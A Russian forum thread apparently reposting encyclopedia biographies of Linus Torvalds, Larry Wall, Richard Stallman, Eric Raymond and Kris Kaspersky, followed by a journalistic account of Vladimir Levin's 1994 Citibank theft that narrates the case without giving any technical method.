Линус Бенедикт Торвальдс, или Торвалдс (швед. Linus Benedict Torvalds; р. 28 декабря 1969 в Хельсинки), — финский программист, хакер.

Воодушевлённый прочтением книги Эндрю Таненбаума, посвящённой операционной системе Minix, Линус создал Linux — ядро операционной системы GNU/Linux, являющейся на данный момент самой распространённой свободной операционной системой.

С 1997 по 2003 год Линус работал в фирме Трансмета. После этого организовал Open Source Development Labs . В данный момент он работает в Linux Foundation(с 2007), где занимается разработкой ядра Linux.
Биография

Родители Торвальдса, шведоговорящие финны Нильс и Анна Торвальдсы, были в 60-х годах студентами-радикалами, отец даже был коммунистом, в середине 70-х проведшим вместе с Линусом год в Москве. Линус был назван в честь Лайнуса Полинга. В школе преуспевал в физике и математике. Был малообщительным, скромным мальчиком. Его часто дразнили из-за политических взглядов его отца.

В 1988 году Линус поступил в Университет Хельсинки, который окончил в 1996 году, получив степень магистра кибернетики.

Линус Торвальдс живёт в г. Портленд (США, штат Орегон) с женой Туве (финск. Tove), шестикратной чемпионкой Финляндии по каратэ и бывшей студенткой Линуса, тремя дочерьми: Патрицией Мирандой (р. 5 декабря 1996), Даниэлой Йоландой (р. 16 апреля 1998) и Селестой Амандой (р. 20 ноября 2000), а также котом Рэнди (р. март-апрель 1990).

С февраля 1997 по июнь 2003 года работал в компании «Transmeta Corporation», после чего перешёл в компанию «Open Source Development Labs» (теперь — «The Linux Foundation»). Хотя Linux Foundation находится в Бивертоне (англ. Beaverton), Торвальдс работает дома.

Личный талисман Линуса Торвальдса — пингвин Тукс (англ. Tux), ставший также эмблемой «Linux». В своей книге «Just for Fun» Торвальдс пишет, что пингвина как эмблему он выбрал из-за того, что однажды в зоопарке его укусил пингвин.

Один из «Законов Линуса», окончательно сформулированный Эриком Реймондом, гласит: «При достаточном количестве глаз все ошибки лежат на поверхности». Глубокой ошибкой называется такая, которую трудно найти, но если достаточно много людей ищет ошибки, то все они становятся поверхностными. Оба программиста разделяют идеологию открытого исходного кода, отчасти основанную на вере в этот закон.

Однако, их взгляды расходятся в том, что важнее: открытость кода или «свободность» программ, их распространения (сторонником последнего является Реймонд).

Тем не менее, в отличие от многих идеологов открытого исходного кода, Торвальдс очень редко выступает с публичными комментариями о конкурирующих программах, за что критикуется организацией GNU. Его критиковали за работу над программным обеспечением с закрытым исходным кодом в компании «Transmeta» и за использование закрытого продукта «BitKeeper» (он пришёл на замену старой схеме внесения изменений в официальное ядро путём посылки патчей в 2002 году; затем в апреле 2005 бесплатный доступ к этой утилите был запрещён, и тогда же началась разработка свободной альтернативы — git, успешно заменившей BitKeeper уже через два месяца). Однако, на выпады против «Linux» и идеологии открытого кода со стороны таких софтверных гигантов, как «Майкрософт» и SCO, он реагировал резко.

[править] Linux
Символ Linux
Символ Linux

В 1981 году Лео, дедушка Линуса, математик, познакомил внука с ЭВМ «Commodore VIC-20», используемой им для математических вычислений. Линус заинтересовался программированием и прочитал руководства к машине. Затем он начал читать компьютерные журналы и писать собственные программы, сначала на BASIC, а затем на ассемблере.

Со школьных лет Линус получал стипендии за успехи в математике. Первой купленной им ЭВМ была «Sinclair QL», тогда стоившая почти 2000 долларов США.

После окончания школы Линус поступил в Университет Хельсинки на курс информатики. Обучение было прервано годовой службой в армии.

Значимым событием в жизни Торвальдса было прочтение им книги Эндрю Таненбаума «Операционные системы: разработка и реализация» (Operating Systems: Design and Implementation, ISBN 0-13-638677-6). В книге на примере написанной Таненбаумом ОС «Minix», представлена структура систем семейства UNIX. Линус очень заинтересовался прочитанным. Позже он купил новый компьютер на базе 386-го процессора и установил «Minix».

Обнаружив недостатки в системе, он начал писать собственный эмулятор терминала, в котором реализовал переключение задач. Затем Линус добавлял в программу всё новые и новые функции, благодаря чему она вскоре стала обретать черты полноценной операционной системы. Затем он послал ныне знаменитое объявление в новостную группу «Миникса»[1]:

From: torvalds@klaava.Helsinki.Fi (Линус Бенедикт Торвальдс)
Newsgroups: comp.os.minix
Subject: Что бы вы больше всего хотели увидеть в миниксе?
Summary: маленький опрос о моей новой операционной системе
Keywords: 386, preferences
Message-ID: <1991Aug25.205708.9541@klaava.Helsinki.Fi>
Date: 25 Aug 91 20:57:08 GMT
Organization: Университет Хельсинки

Здравствуйте, все те, кто использует миникс -

Я делаю (бесплатную) операционную систему (это всего лишь хобби, и она
не будет большой и профессиональной как gnu) для клонов 386(486) AT.
Работа над ней началась в апреле и скоро будет закончена. Я бы хотел
получить отзывы о том, что людям нравится/не нравится в миниксе, ибо
моя ОС на неё похожа (такое же устройство файловой системы
(из практических соображений) среди всего прочего).

Я уже перенёс bash(1.08) и gcc(1.40), и всё, кажется, работает.
Подразумевается, что практические вещи у меня появятся через несколько
месяцев, и я хотел бы узнать, каких особенностей хотелось бы большинству.
Любые предложения принимаются, но я не обещаю, что реализую их :-)

Линус (torvalds@kruuna.helsinki.fi)

PS. Да, у неё нет никакого миниксовского кода, и у неё есть многопоточная
фс. Она НЕ переносима (применяет переключение задач 386-го, и т. д.), и,
вероятно, никогда не будет поддерживать ничего, кроме жёстких дисков
AT, т.к. это всё, что у меня есть :-(.

17 сентября 1991 года Линус выложил исходный код программы (версии 0.01) для общедоступной загрузки. Система сразу же вызвала большой интерес. Сотни, потом тысячи программистов стали интересоваться системой (директорию с программой, за неимением лучших вариантов, назвали «Linux») и работать над её улучшением и дополнением. Она распространялась и по сей день распространяется на условиях общественной лицензии GNU — GPL.

Автор «Minix», профессор Эндрю Таненбаум, неожиданно выступил с резкой критикой дизайна системы:

«Я по-прежнему считаю, что создавать монолитное ядро в 1991 году — фундаментальная ошибка. Скажите спасибо, что вы не мой студент: за такой дизайн я бы не поставил высокой оценки :-)» (из письма к Линусу Торвальдсу). Свой пост Таненбаум озаглавил «Линукс устарел».[2]

Кроме монолитного ядра, Таненбаум критиковал «Linux» за отсутствие переносимости. Таненбаум предсказывал, что процессоры 80x86 в недалёком будущем исчезнут, уступив место архитектуре RISC.

Критика сильно задела Торвальдса. Таненбаум был знаменитым профессором, и его мнение имело значение. В данном вопросе, однако, он ошибался. Линус Торвальдс настаивал на своей правоте.

Открытость ядра, написанного Линусом, дала возможность использовать его совместно с наработками (компиляторами GCC, базовыми утилитами ОС) GNU, проекта свободного варианта системы UNIX, существовавшего с 1983 года (вся эта система часто называется «Linux», однако правильнее было бы называть её «GNU/Linux»). Популярность системы росла, и позже о ней заговорили журналисты во всём мире. «Линукс» и Линус стали известны.

В настоящее время лишь около двух процентов системного ядра «Linux» написано самим Торвальдсом, но за ним остаётся решение о внесении изменений в официальную ветку ядра.

Торвальдс владеет товарным знаком «Linux» и следит за его использованием[3] через некоммерческую организацию «Linux International» и при помощи пользователей «Linux» во всём мире.

В опросе «человек века» журнала «Тайм», проведённом в 2000 году, Линус занял 17-е место. В 2001 году он разделил с Ричардом Столлманом и Кеном Сакамурой приз Такеды за вклад в социально-экономическое процветание. В 2004 году «Тайм» включил его в список самых влиятельных людей мира.

Добавлено (31.07.2008, 11:35)
---------------------------------------------
Известные люди
Уолл, Ларри
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск

Ларри Уолл (англ. Larry Wall) — американский программист. Знаменит как создатель языка программирования Perl. Лингвист по образованию.
Ларри Уолл
Larry Wall
Портрет
Род деятельности: программист, лингвист, писатель
Дата рождения: 27 сентября 1954
Место рождения: Лос-Анджелес, Калифорния, США

Уолл автор клиента Usenet и широкоиспользуемой программы patch. Он дважды побеждал в международном конкурсе запутанного кода на языке программирования Си (IOCCC) и был лауреатом первой награды Free Software Foundation за продвижение свободного программного обеспечения (Free Software Foundation Award for the Advancement of Free Software) в 1998 году.

Добавлено (31.07.2008, 11:35)
---------------------------------------------
Известные люди
Столлман, Ричард Мэттью
Материал из Википедии — свободной энциклопедии
(Перенаправлено с Столлмэн, Ричард Мэттью)
Перейти к: навигация, поиск
Ричард Мэттью Столлман
Richard Matthew Stallman
Портрет
Ричард Столлман в Техническом университете Дании (DTU) в 2007
Дата рождения: 16 марта 1953
Место рождения: Нью-Йорк, США
Фотография Ричарда Столлмана, взятая с обложки книги Сэма Вильямса «Free as in Freedom», опубликованной в марте 2002
Фотография Ричарда Столлмана, взятая с обложки книги Сэма Вильямса «Free as in Freedom», опубликованной в марте 2002
Ричард Столлман на «Викимании-2005»
Ричард Столлман на «Викимании-2005»

Ричард Мэттью Столлман (англ. Richard Matthew Stallman, очень часто rms, по инициалам; родился 16 марта 1953, Манхэттен, Нью-Йорк) — основатель движения свободного ПО, проекта GNU, Фонда свободных программ и Лиги за свободу программирования. Автор концепции «копилефта», призванной защищать идеалы движения; эту концепцию он с помощью юристов позже воплотил в лицензии GNU General Public License (GNU GPL) для ПО.

Столлман также известный программист. Среди программ, автором которых он является, GNU Emacs, Коллекция компиляторов GNU (GCC) и Отладчик GNU (GDB). С середины 1990-х годов Столлман стал программировать значительно меньше, посвятив себя распространению идей свободного ПО. Он ведёт скромный образ жизни странствующего «евангелиста» и «философа» движения свободных программ.
Краткая биография

Ричард Столлман родился 16 марта 1953 года в Нью-Йорке, в еврейской семье[1] Дэниэля Столлмана[источник?] и Элис Липпман[2]. В 1974 году окончил Гарвард и поступил в Массачусетский технологический институт. Вскоре отказался от планов получения дальнейшего научного образования, но остался в МТИ работать программистом в лаборатории искусственного интеллекта. В январе 1984 года оставил работу в МТИ, чтобы посвятить себя работе над проектом GNU, который он основал в сентябре 1983.

Лауреат премии имени Грейс Мюррей Хоппер (1990).
Свободное ПО и терминология

На протяжении многих лет Столлман борется за чистоту и точность своей терминологии. Проблема усложнена в английском языке тем, что «свободное» и «бесплатное» обозначаются одним и тем же словом «free». В настоящее время (в том числе с поддержки коммерческих компаний) более распространённым стало альтернативное наименование «Open Source» («открытые исходники»), хоть такое ПО обычно является также свободным. Столлман, однако, совершенно не согласен с употреблением этого термина (по крайней мере по отношению к программам, защищённым лицензиями GNU GPL и LGPL), поскольку этот термин скрывает, что настоящая цель такого ПО есть свобода. Несмотря на это, люди и группы, которые не солидарны с моральной философией Столлмана или которые к ней безразличны, очень часто смешивают понятия «свободное программное обеспечение» и «ПО с открытым исходным кодом».

По вышеуказанным причинам Столлман также убеждён, что нужно говорить «собственническое ПО» (англ. proprietary) вместо «ПО с закрытым исходным кодом», если ПО, о котором идёт речь, не может свободно распространяться, использоваться или модифицироваться. Столлман также считает неверным использование собирательного понятия «интеллектуальная собственность» и утверждает, что об авторском праве, патентах, торговых марках и тому подобных обстоятельствах надо говорить раздельно.

Столлман очень серьёзно относится к терминологии. Например, он даёт интервью только тем журналистам, которые согласны использовать его терминологию в статье о нём. Широко известно его требование называть систему с ядром Linux и средой GNU — GNU/Linux, так как такое название отражает её происхождение.

Частная жизнь

Ричард Столлман — филкер, и на его сайте и сайте Проекта GNU размещены его песни на различные темы.[rms 1][rms 2][3]

Притяжство́ (слово образовано объединением слов притяжение и Рождество; английское название Grav-mass) — это праздник, отмечаемый 25 декабря каждого года, в честь дня рождения английского физика Исаака Ньютона, который разработал теорию всемирного тяготения. Идея празднования этого дня принадлежит Ричарду Столлману. В этот день люди празднуют существование постижимых законов физики. Так как, согласно легенде, Ньютон открыл свой закон в результате падения яблока, в этот день рекомендуется наряжать деревья яблоками или другими фруктами, но так, чтобы фрукты иногда падали, показывая в действии закон всемирного тяготения.[rms 3]
Ричард Столлман на факультете ВМиК МГУ
Ричард Столлман на факультете ВМиК МГУ

Визиты в Россию

* В 2008 году Столлман приезжал в Москву. Это уже второй его визит (первый был 15 лет назад, в апреле 1993[4][5]). Он выступил с лекциями в МГУ и МФТИ на тему «Свободное программное обеспечение: этика и практика».

Добавлено (31.07.2008, 11:37)
---------------------------------------------
Известные люди
Рэймонд, Эрик Стивен
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск
Эрик С. Рэймонд (2005)
Эрик С. Рэймонд (2005)

Эрик Стивен Рэймонд (англ. Eric Steven Raymond; род. 4 декабря 1957 года) — американский хакер, автор трилогии «Собор и Базар», «Заселяем ноосферу» и «Волшебный котел», описывающей экологию и этологию разработки программного обеспечения, сооснователь Open Source Initiative.

Рэймонд является нынешним редактором и хранителем Jargon File — сетевого энциклопедического словаря, посвящённого хакерскому сленгу и хакерской культуре. Кроме того, именно Рэймонд в 2003 году предложил использовать одну из фигур игры «Жизнь» в качестве эмблемы хакеров.

Добавлено (31.07.2008, 11:38)
---------------------------------------------
Известные люди
Крис Касперски
Материал из Википедии — свободной энциклопедии
(Перенаправлено с Касперски, Крис)
Перейти к: навигация, поиск
Крис Касперски
Портрет
Дата рождения: 1977 год

Крис Касперски (aka KPNC aka Мыщъх aka nezumi (яп. ネズミ, мышь) aka n2k aka elraton) — псевдоним известного российского хакера, автора книг по программированию, взлому и отладке программ. Его книги вместе с книгами проф. И. Д. Медведовского продолжают отечественную традицию, начатую проф. Н. Н. Безруковым и П. Л. Хижняком, выгодно отличаясь от этого предыдущего поколения, только нащупывавшего «каноны жанра».

Во-первых, Крис не скрывает «опасные» места кода, как это делал Безруков в «Компьютерной вирусологии». Во-вторых, в своих учебниках Крис уделяет внимание не только «боевому», но и этическому воспитанию читателя. Из-за отсутствия этого подхода книга Хижняка «Пишем вирус… и антивирус для IBM PC-совместимых компьютеров» стала скандальной.

С 1990 года Крис активно писал в эхоконференции Фидо RU.HACKER. Там его сообщения были замечены издательством «Солон», где, впоследствии, он и издавал свои книги. В течение этого времени он написал целую серию книг и статей, посвящённых в основном низкоуровневым вещам и содержащих «рабочие» техники работы с дизассемблером и отладчиком. Первая статья вышла в журнале "Звездочет" в 1995-м году, а первой книгой стала "Техника и философия хакерских атак", изданная в 1999 году. По-видимому, в конце 1999 года Крис ушёл из Фидо.

Весной 2000-го года Крис Касперски присутствовал в Москве на открытии Спрыга-2k и раздавал листовки с рекламой своей книги «Образ мышления — дизассемблер IDA». Возможно, это было единственное «живое» появление Криса на публике.

Среди первых книг Криса:

* Техника и философия хакерских атак. М.: СОЛОН-Р, 1999, ISBN 5-93455-015-2
* Образ мышления — дизассемблер IDA. М.: СОЛОН-Р, 2001, ISBN 5-93455-093-4
* Техника сетевых атак. М.: СОЛОН-Р, 2001, ISBN 5-93455-078-0
* Фундаментальные основы хакерства. Искусство дизассемблирования. М.: СОЛОН-Р, 2002, ISBN 5-93455-175-2

В 2008 году Евгений Касперский назвал Криса "не очень хакером".

Крис не изменяет и другому своему увлечению — астрономии. Известные астрономические сайты публикуют его статьи, посвящённые отечественным телескопам и наблюдению звёздного неба.

Любит произведения Фрэнка Герберта и часто использует их для эпиграфов.

Проживает в Краснодарском крае, село Успенское. Холост. Работает [1]

Добавлено (31.07.2008, 11:47)
---------------------------------------------
Известные люди
Левин Владимир Леонидович
Дело Хакера №1
Подробности величайшего ограбления века
Сергей Петухов
Левин Владимир Леонидович
Родился в 1967 году в типичной семье ленинградских интеллигентов: отец - инженер-конструктор на "почтовом ящике", мама - врач-психотерапевт. Володя был у них единственным и, по-видимому, избалованным ребенком. Но не надо думать, что талантливый хакер-самоучка с детства был вундеркиндом со всеми вытекающими отсюда комплексами. Напротив, он преуспевал не только в учебе, но и в спорте и заработал второй мужской разряд по фехтованию. В 24 года он оканчивает химфак Ленинградского технологического института и защищает диплом на тему "Молекулярно-биологический анализ эпидемических вирусов гриппа В, выделенных на территории СССР в 1991 году".

Трудно поверить в эту фантастическую историю, когда сидишь перед допотопным 386-м "писюком" и набираешь этот текст, который вы сейчас читаете. Ведь с помощью точно такой же "Ай-Би-Эмки" (со слабеньким модемом) интеллигентный молодой человек по имени Володя Левин, не вставая со стула в грязноватой комнате на третьем этаже дома номер 8 по улице Малой Морской в городе Санкт-Петербурге, вскрыл сейф американского Ситибанка на улице Уолл-стрит в городе Нью-Йорке и взял оттуда 10 700 952 чужих доллара. Они принадлежали финансово-банковским корпорациям в Колумбии, Мексике, Аргентине, Канаде, США, Индонезии и Новой Зеландии.
Если вдуматься, оторопь берет! Нажал несколько буковок и цифр на клавиатуре домашнего компьютера - и возникает "юзерс френдли", картинка для тупых, где нарисовано, на какие клавиши нажимать дальше. И компьютер покажет, сколько денег лежит на счете олигарха X, или депутата Y, или министра Z в каком-нибудь швейцарском или андоррском банке. И если опять узнать, на какие клавиши нажимать дальше, то можно эти деньги изъять и перечислить в Сбербанк на счет какого-нибудь детского дома, как это делал Юрий Деточкин. Вот до чего дошла наука!
Только одна закавыка: на какие клавиши поначалу-то нажимать? Потому что ни олигарх, ни депутат, ни министр вам этого не скажут, а банк тем более. Выяснить это самостоятельно трудно. Но можно. Ведь смог же разгадать шифры и коды Ситибанка и его клиентов один интеллигентный молодой человек из города Санкт-Петербурга.
Одноклеточное существо
Дело русского кибергангстера всех времен и народов Владимира Левина четвертый год не сходит со страниц прессы и экранов телевизоров. Однако до сих пор никто не знает, что в действительности сделал питерский хакер-самоучка. Вроде бы Ситибанк обокрал, но как именно - секрет. Якобы этот секрет знают ситибанковские и фэбээровские компьютерщики, но своим русским коллегам не говорят. Вот уже второй год обещают раскрыть этот секрет, но никак сопроводительные бумаги не оформят, на своих американских бюрократов кивают.
Петербургские "ноды" (хакеры на местном питерском жаргоне) смеются и говорят, что еще в 1993 году сей страшный секрет с жестокого бодуна продал Вовке Левину их непохмеленный коллега с эпатирующей кличкой Протозоид (по-русски "Одноклеточное Существо") за сто баксов. Петербургская милиция пожелала побеседовать с Протозоидом, но не обнаружила физического тела такового, хотя имела в своем распоряжении все возможности найти и доставить на допрос любого человека, реально существующего в этом мире и проживающего в городе Санкт-Петербург. По всей видимости Протозоид (он еще называет себя Мегазоидом) - остроумная мистификация ироничного хакера.
Не исключено, впрочем, что после этой публикации оскорбленный Протозоид начнет безобразничать в электронной почте "Огонька", чем лишний раз подтвердит свою несостоятельность как хакера.
Всех на Западе, где дело Левина знают гораздо лучше, чем в России, удивляло, почему человек, укравший из Ситибанка десять миллионов долларов, оказался таким бедным, что не смог оплатить адвокатов, а пользовался услугами казенных защитников и еще имел неблагодарность обвинять одного из них, что тот якобы агент ФБР. Западный читатель страшилок о "русской мафии", наверное, удивился бы еще сильнее, попав в петербургскую квартиру кибергангстера всех времен и народов или в обшарпанный офис фирмы, где он трудился. Если Левин и имел что-то от своего преступного бизнеса, то был очень жадным типом и неблагодарным сыном. Жил он с родителями если, по нашим меркам, не совсем бедно, то, на взгляд западного обывателя, просто по-нищенски.
Разумеется, на эти и множество других вопросов мог бы ответить сам Левин. Наверное, он так и сделает и напишет о себе книжку, которая обречена стать мировым бестселлером. По крайней мере это реальный шанс для Левина одним разом расплатиться с Америкой, а не выплачивать ежемесячно до конца жизни по 600 с лишним долларов по исполнительным листам американского суда, оценившего ущерб от левинских умений в 240 015 долларов. Но даже если Левин напишет одну правду, всю правду и ничего, кроме правды, вопросы все равно останутся. Ибо он знает только то, что знает. А многого Владимир Левин не может знать, учитывая его роль в афере, на которую было приклеено его имя.
Организовано интеллигентно...
По своей специальности микробиолог Левин не проработал ни дня, а сразу устроился в АОЗТ "Сатурн", контора которого располагалась на Малой Морской (б. Гоголя), 8, в двух шагах от Невского.
Вообще-то "Сатурнов" на протяжении нескольких лет, пока в них работал Левин, было несколько: "Сатурн Лтд.", "Сатурн Спб." и, возможно, еще с какими-то приставками, но по сути это была одна и та же контора, перерегистрированная несколько раз по причинам, известным всем, кто занимался российским бизнесом. Важно другое: "Сатурн" возник не на пустом месте, а был наследником некоего ленинградского кооператива еще перестроечных времен, который создал Леонид Глузман.
В 1992 году Леонид Хаимович уехал жить в Лондон вместе с дочерью Марией. Дочь Мария была замужем за бывшим советским гражданином Валерием Мирошниковым (Сандлером), а дочь Мирошникова -- замужем за сыном Глузмана, Алексеем Галаховым, которого папа Глузман оставил в Питере руководить "Сатурном". Вот такое было семейное предприятие.
Посторонних людей в "Сатурн" не брали. Володя Левин попал туда по знакомству: левинские родители еще со студенческих лет дружили с Леонидом Глузманом, и Глузман знал Володю чуть ли не с пеленок. Больше того, говорят, что всеми своими программистскими знаниями микробиолог Левин обязан Леониду Хаимовичу, который не жалел времени и помогал освоить персональный компьютер Володе, действительно имевшему к этому делу талант от Бога. Сам Леонид Глузман был профессиональным программистом, в шестидесятых годах работал еще на БЭСМах и "Минсках", когда этих динозавров отечественной кибернетики называли гордой аббревиатурой "ЭВМ".
В силу своего опыта и знаний Леонид Хаимович был постановщиком задачи. Нет, не в том смысле, о каком вы, быть может, подумали. "Постановщик задач" - это программист высшей квалификации. Он не тратит своего драгоценного времени на рутинную процедуру писания программ, он ставит задачу перед обычными программистами, задает параметры будущей программы и потом принимает работу, а при необходимости консультирует и помогает.
Например, Володя Левин под руководством Леонида Хаимовича создал программу бухгалтерского учета "Турбо-Сальдо", занявшую 2-е место на всероссийском конкурсе компьютерных бухгалтерских программ, и за соответствующее вознаграждение АОЗТ "Сатурн" ставил эту программу всем желающим. Вице-президент "Сатурна" Владимир Левин отвечал в фирме как раз за компьютерное направление ее деятельности.
Формально торгующий "софтом", "Сатурн", как любая нормальная коммерческая организация в России, приторговывал всем, что могло принести прибыль. В частности, поставлял в Петербург оптом английское пиво "Монарх". Питерские следователи до сих пор не могут выяснить, кто его производил. В самой Англии о пиве "Монарх" впервые услышали от петербургской милиции и очень удивились, даже просили прислать попробовать. Похоже, и сами "сатурновцы" не очень представляли, кто его, это пиво, делает, но, наверное, не очень этим интересовались. Ибо в отечественной коммерции чем меньше знаешь, тем дольше проживешь.
Кроме фирмы, директор "Сатурна" Алексей Галахов унаследовал от отца Леонида Хаимовича большую жизненную энергию и коммерческую жилку. Будучи на два года старше Левина, Алексей находил время совмещать бизнес с работой врача-нейрохирурга в больнице им. 25-го Октября.
Примерно в середине 1993 года домой в Петербург возвращается молодой доктор Лямин Антон Ильич, уехавший в Израиль с родителями еще в 1989-м. На исторической родине Лямин как врач не понадобился, а в родном Питере, по-видимому, сам не захотел существовать на нищенскую зарплату простого ординатора. Впрочем, теперь у Лямина было одно важное преимущество -- паспорт израильского гражданина, позволявший кататься в Хельсинки и обратно, как, допустим, в Ораниенбаум или Гатчину. И Лямин вместе с женой Ириной регистрирует в Гибралтаре фирму "Кармейн пропертиз" (для этого супруги, разумеется, не ездили к Геркулесовым столбам; за пару сотен долларов у нас в России можно зарегистрировать любую оффшорную фирму, хоть на Огненной Земле) и открывает счет фирмы в финском банке. Можно было открыть и личные счета, но это было бы не совсем то. С банковским счетом солидной гибралтарской фирмы супруги могли сойти в глазах финнов за преуспевающих русских бизнесменов, а не мелких гешефтмахеров.
По словам некоторых ляминских недоброжелателей, на самом деле доктор Лямин просто предлагал банковский счет "Кармейн пропертиз" для обналичивания твердой валюты любому желающему в Питере. Это очень удобно, потому что в российском банке валютой всю сумму не выдадут, часть надо обязательно продать государству за рубли. За услуги доктор Лямин якобы брал с питерских бизнесменов по-божески: от 5 до 10 процентов в зависимости от суммы и срочности. Впрочем, оклеветать честного израильского бизнесмена в России может каждый, у нас антисемиты даже в Думе заседают.
В общем, как бы там ни было, а в декабре 1993 года поднаторевший в финансовых вопросах врач Антон Лямин устраивается в "Сатурн" главбухом.
Здесь он тоже не посторонний человек. С директором "Сатурна" Алексеем Галаховым они жили в одном дворе и потом учились в одном медицинском институте.
Итак, в самом конце 1993 года руководящие посты в "Сатурне" занимают трое толковых молодых людей, почти ровесники и близкие приятели. Правда, есть одна тонкость: если Алеша Галахов и Антоша Лямин дружат с пеленок, то Володю Левина они хоть и знают с детства, но все-таки он их новый друг. Крепкая мужская дружба -- это как любовь, по-настоящему дружат только вдвоем.
Так втроем они, наверное, проводили уходящий 1993 год и подняли в своей конторе бокалы за успех в будущем, 1994 году. Наверное, чокнулись, выпили, перемигнулись и весело рассмеялись. Ведь планы в наступающем году у них были грандиозные!
Беззащитная жертва
В самом начале 1994 года Ситибанк ввел для удобства своих клиентов новую электронную систему управления наличными фондами (СУНФС). Система предназначалась не для простых вкладчиков. Ведь Citibank N.A. -- это банковское подразделение глобальной финансовой организации Citicorp., действующей в 93 странах мира.
Сам банк был основан в 1812 году с огромным по тем временам уставным капиталом в 2 млн. долларов. В 1894 году он стал крупнейшим банком США, а в 1929-м -- мира. С 1979 года Ситибанк становится ведущим мировым торговцем валютой. Одним из первых он применил компьютеры в банковской сфере. В январе 1994 года открылся его дочерний банк в Москве -- Citibank Т/О Moscow.
Итак, ситибанковская новинка СУНФС предназначалась для тех самых подразделений банка в 93 странах, для других банков -- клиентов Ситибанка и для крупных финансовых корпораций. Иными словами, Ситибанк был чем-то вроде Центробанка для западных сбербанков, менатепов, инкомбанков, газпромов... Электронная система расчетов СУНФС сильно экономила время и облегчала жизнь любой солидной финансовой организации, желавшей при помощи Ситибанка перебросить за считанные минуты свои капиталы из одного уголка земного шара в другой.
В этом и состоит одна из главных загадок дела Левина. О нем почему-то пишут как о хакере, который распоряжался чужими клиентскими деньгами, лежавшими на счетах Ситибанка. Но в том-то и дело, что питерский микробиолог и торговец самопальным "английским" пивом Володя Левин распоряжался счетами не простых вкладчиков, а солидных корпораций, что подразумевало более высокий статус хакера. Левин не мог маскироваться в компьютерной сети Ситибанка под виртуальной личиной простого операциониста, имеющего дело с трудовыми накоплениями какого-нибудь мистера Питерса или миссис Джонс. Левину, чтобы совершить подвиги, которые ему потом поставила в вину американская Фемида, надо было иметь доступ к паролям и кодам как минимум одного из администраторов сети СУНФС и суметь безошибочно, с первого раза сымитировать действия этого администратора в разгар рабочего дня. Да так ловко, чтобы главный администратор всей сети не заметил присутствия и, главное, активной деятельности непрошеного помощника.
Потом Ситибанк оправдывался перед своими корпоративными клиентами, что, дескать, ежедневно переводил по всему миру больше полутриллиона (!) долларов и, мол, трудно было сразу заметить в этом циклопическом стоге иголку перевода на какие-то жалкие сотни тысяч. Однако в огромной массе публикаций по делу Левина один раз -- только однажды и только во время суда над Левиным в 1998 году -- в ежедневной газете "Ю-Эс-Эй тудей" вскользь промелькнула и потом уже больше нигде не появлялась странная фраза: "Неизвестно, как русский хакер раздобыл пароль и коды, принадлежавшие банковскому служащему из отделения в Помпано-Бич, штат Флорида". Действительно, как?
Ведь если (по каким-то высшим соображениям) солидное издание "Ю-Эс-Эй тудей" не вводит своих читателей в заблуждение, то Левин не лез в Ситибанк напролом, как мифический Протозоид, а просто "помогал" одному ситибанковскому клерку из Флориды в его многотрудной деятельности. И еще одно "если". Если в рядах Ситибанка предателей нет (о чем Ситибанк заявлял неоднократно), то Левин просто сделал виртуальный слепок с ключика флоридского клерка и аккуратно, без взлома отмыкал им сейфы финансовых корпораций, обслуживание которых было поручено этому служащему.
Хотя зачем так далеко ходить, во Флориду. Как уже сказано, в 1994 году в Москве был открыт дочерний банк Ситибанка -- Citibank Т/О Moscow -- полностью с иностранным капиталом (что по российским законам, кажется, было запрещено, но это мелкая деталь, к делу не относящаяся). Любая девушка-операционистка из московского Ситибанка могла не по злому умыслу, а просто так, допустим, по любви рассказать симпатичным питерским мальчикам про коды и пароли и про многое другое. Возможно, даже не тех банков и корпораций, которые потом потрошил Левин, но согласитесь, что главное -- принцип действия защитной программы, а конкретные буковки и цифирки кодов и паролей -- это детали. В конце концов почему американские программисты должны быть заведомо умнее русских хакеров?
Впрочем, гадать можно до бесконечности. Истину сейчас знает только сам Левин и, возможно, ФБР (если в обмен на смягчение приговора Левин сказал им правду). По идее, истину должен знать еще один человек по имени Саша, который, как теперь установлено следствием, бдел по ночам за компьютером в офисе "Сатурна" вместе с Левиным. И опять-таки если Левин сдал своего консультанта Сашу, то только американцам из ФБР. Питерская милиция до сих пор гребет частым бреднем, в большом количестве вылавливая в здешнем хакерском мирке разных Саш и Шуриков, но -- все не те.
Впрочем, с Сашей ли или без оного, а с 30 июня по 3 октября 1994 года Вова сделал 40 несанкционированных переводов чужих денег на общую сумму 10 700 952 доллара из Ситибанка на счета своих знакомых и знакомых своих знакомых в банках Санкт-Петербурга, Хельсинки, Роттердама, Тель-Авива, Дюссельдорфа, Сан-Франциско и Цюриха. А Коля, Юра, Антон и Женя с Катей успели снять наличными около четырехсот тысяч долларов.
Остальные денежные переводы Ситибанк успел заблокировать, так как якобы вовремя сработала система электронной безопасности банка. И после ее первого сигнала ФБР якобы повело хитроумную игру с "русской мафией", закончившуюся тем, что главного русского кибергангстера Владимира Левина выманили за границу и арестовали.
Ах, если бы все было так красиво и гладко! Что-то не слышно, чтобы кого-то из ФБР наградили за поимку Левина медалью американского Конгресса. А ситибанковская PR-дама госпожа Эми Дейтс, четвертый год подряд мужественно отражающая наскоки прессы, и вовсе запуталась, рассказывая, кто и когда схватил за виртуальную лапу русского злодея.
Мальчики
Вокруг "Сатурна", торговавшего поддельным "английским" пивом, самодельными компьютерами (их собирал Левин из комплектующих, которые ему присылали из Англии) и имевшего возможность обналичивать валюту за рубежом, естественно, крутятся питерские бизнесмены и бандиты. У "Сатурна" наверняка есть "крыша" со всеми вытекающими из этого знакомствами. Например, в "Сатурн" захаживает солидный мужчина примерно 50 лет Евгений Владимирович Корольков, ранее не судимый и работавший водителем автобуса, а ныне владелец двух оффшорных компаний с офисами в Сан-Франциско и счетами в тамошних банках. У Королькова есть жена Екатерина на двадцать лет моложе его. У жены Екатерины есть личный счет в сан-францисском банке.
И вот однажды весной 1994 года Корольков в присутствии директора "Сатурна" Алексея Галахова вдруг заявляет Левину, что он, Корольков, мол, знает пароль доступа в операционную систему Лионского Кредита. Галахов и Левин смущены такой осведомленностью бывшего шофера и делают вид, что не слышат его прозрачного намека.
По логике вещей, задумав воровство, Левин и его друзья должны были сначала изучить своих потенциальных жертв. Глупо снять у кого-то деньги, чтобы владелец хватился их в тот же день или назавтра. Надо было выбрать крупные компании с многомиллиардными оборотами, и совсем хорошо было бы знать, как часто эти компании подводят баланс -- ежемесячно, раз в квартал и т.п. Перевести деньги со счета на счет -- это полдела. Главное -- получить их наличными.
